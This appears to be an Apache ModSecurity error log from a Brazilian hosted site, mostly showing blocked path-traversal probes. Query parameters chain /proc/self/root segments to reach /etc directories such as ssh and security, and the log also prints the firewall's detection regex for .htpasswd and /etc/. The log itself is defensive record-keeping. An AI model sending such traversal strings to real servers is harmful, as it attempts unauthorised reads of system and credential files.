[Tue Mar 17 14:27:17.606812 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.241.31:39160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO9a4xEDsg_V3ESNZN5gAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:27:33.133797 2026] [proxy_fcgi:error] [pid 29151:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34702] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:27:38.387585 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:39172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPChj0p0SRWAqcjGF7AgAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:27:54.131643 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34944] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:28:04.463663 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:46936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPJNY0UrI5A3LftIz9kAAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:12.915229 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.31:39116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPLKBJNF7axNlVR0UZCAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:14.415921 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.31:39126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPLq4xEDsg_V3ESNZN_AAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:14.487501 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.228.61:41228] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmPLqt8Nd0UC_OcbVHMaAAAAJQ"]
[Tue Mar 17 14:28:15.779316 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:39130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPL9Y0UrI5A3LftIz9kwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:16.141804 2026] [proxy_fcgi:error] [pid 9299:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:28:16.798025 2026] [:error] [pid 9299:tid 140411582465792] [client 74.7.244.43:37514] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmPML-sgTmmJoPuMdy32QAAAtM"]
[Tue Mar 17 14:28:17.419271 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:50622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPMQeiSKl8TjouI-YbKAAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:19.046235 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:50628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPM3Ik7brgkOH-rIWNWgAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:20.388313 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.241.31:50642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPNK4xEDsg_V3ESNZN_wAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:21.899054 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.241.31:50656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPNRj0p0SRWAqcjGF7EAAAAw4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:23.447472 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.241.31:50666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPN6t8Nd0UC_OcbVHMbQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:26.519411 2026] [:error] [pid 9299:tid 140411557287680] [client 74.7.241.31:50680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPOr-sgTmmJoPuMdy34AAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:28.546309 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.241.31:54568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPPL-sgTmmJoPuMdy35QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:32.596992 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.241.31:54572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPQHIk7brgkOH-rIWNXgAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:38.125876 2026] [proxy_fcgi:error] [pid 17965:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:35488] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:28:40.202364 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.241.31:53046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPSK4xEDsg_V3ESNZOBwAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:42.727538 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.241.31:53048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPSr-sgTmmJoPuMdy37QAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:44.333665 2026] [:error] [pid 29151:tid 140411565680384] [client 74.7.241.31:53052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPTPPqhzTj3BvfDX-JhwAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:45.770149 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:53058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPTdY0UrI5A3LftIz9ngAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:47.191019 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.241.31:53060] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPT_PqhzTj3BvfDX-JiQAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:48.674887 2026] [:error] [pid 17965:tid 140411674785536] [client 74.7.241.31:46792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPUKt8Nd0UC_OcbVHMcQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
